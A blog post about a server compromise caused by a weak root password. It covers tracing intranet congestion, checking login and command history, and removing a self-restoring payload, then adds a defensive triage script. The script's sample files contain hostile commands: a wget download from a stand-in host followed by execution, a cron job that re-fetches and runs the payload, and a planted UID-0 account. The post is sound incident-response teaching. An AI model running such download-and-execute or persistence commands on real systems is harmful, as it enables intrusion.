I have worked in the IT industry for more than 6 years and have tried many directions in that time, but I have basically never done development. Recently I started trying operations work. Let me talk about my first accident since moving into operations.
That afternoon I received a work order from development asking me to bring 2 Linux servers online: just install the CentOS 6.5 operating system and then open port 22. The requirements were very simple, and it was soon done, with the root password set to "password". I then handed the servers over to R&D. After that came a pleasant Saturday and a depressing Sunday, because on Sunday my lead told me to come in and check the network: the company servers were unreachable. The test had come, I thought.
After rushing to the company, the first thing I did was log in to the firewall to determine whether the external link was down. I pinged Baidu and found not only that there was no problem, but that the responses were fast. So I quickly narrowed it down to an intranet problem. Testing showed that latency from the servers to the firewall's internal port was very high, which basically confirmed it was the intranet. But what was the matter? Why was the intranet so congested? My first thought was that there might be a DoS attack or a broadcast storm, and my first idea was to capture packets on the firewall, a switch or a server and look. But the network was so sluggish that I could not work remotely, only locally. When I got to the server room and was about to plug in a cable, I noticed that the link lights on several switch interfaces were flashing very frequently, which did not look normal. I checked, and those interfaces were exactly the servers I had just put on the shelves. My feelings were mixed: happy that the problem had been found by such a coincidence, worried that the servers might have been hacked. So I logged in to the servers immediately. I had no experience with this, so I simply started with what I could do quickly. The first thing was to run last to check the login history, which showed logins from a lot of network addresses. The second was to run history to view the commands that had been executed, and unexpectedly that was also abnormal: there were several groups of commands that used wget to download files from the external network, gave them execute permission, and then ran them in the background. From these two points it was certain that the server had been hacked, and after that came a lengthy cleanup: delete the files, kill the processes, check whether an automatic download had been set up, whether new users had been added, and so on. Deleting the files took a while, because the attack program would be deleted and then get rebuilt. It got to the point where I was almost ready to reinstall the system.
Finally, I found a file that lined up exactly with the point at which the attack had started, and once it was deleted the attack program no longer started automatically.
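The three checks described above (shell history for download-then-execute command groups, a planted root account, and a scheduled job that re-fetches the deleted program) as a small triage script. This is an added example, not the commands from the incident; the file contents and the 198.51.100.23 address are constructed samples, and in practice the functions would be pointed at copies of the real files.

```shell
#!/bin/sh
# Triage helpers for a suspected weak-password compromise. Each function takes a
# file path so it can be run against copies of the real files or the samples below.

# Shell-history lines that fit the pattern seen in the post: a network download,
# a chmod that adds execute permission, or a command pushed to the background.
suspicious_history() {
    awk '/(wget|curl)[ \t]+/ || /chmod[ \t]+(\+x|[0-7]*7[0-7]*)/ || /&[ \t]*$/' "$1"
}

# UID-0 accounts in a passwd file other than root: a planted second root account.
extra_root_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Non-comment crontab lines that fetch from the network: the usual way a deleted
# program "comes back" a few minutes after it was removed.
cron_fetchers() {
    awk '!/^[ \t]*#/ && /(wget|curl)/' "$1"
}

# Count lines of output without depending on wc's padding.
count() { awk 'END { print NR }'; }

# Constructed samples standing in for ~/.bash_history, /etc/passwd and /etc/crontab.
WORK=$(mktemp -d)
cat > "$WORK/history" <<'EOF'
cd /tmp
wget http://198.51.100.23/update.bin -O /tmp/.u
chmod +x /tmp/.u
nohup /tmp/.u >/dev/null 2>&1 &
ls -la /tmp
EOF
cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
sysadm:x:0:0::/tmp:/bin/bash
EOF
cat > "$WORK/crontab" <<'EOF'
# m h dom mon dow command
*/5 * * * * wget -q http://198.51.100.23/update.bin -O /tmp/.u && /tmp/.u
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
EOF

# Report: the same three checks the post walked through by hand.
echo "== download/execute command groups in history =="; suspicious_history "$WORK/history"
echo "== extra UID-0 accounts =="; extra_root_accounts "$WORK/passwd"
echo "== cron entries that re-download =="; cron_fetchers "$WORK/crontab"
```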
In hindsight, this hack was entirely caused by a low-level mistake: a weak password. Back when I worked in security I always felt that getting hacked could not be that simple; after this incident I found that as long as your mistake is low-level enough, getting hacked is remarkably simple. Be sure to remember this lesson paid in blood. Weak passwords!!!
Linux practices: a weak password gets the server hacked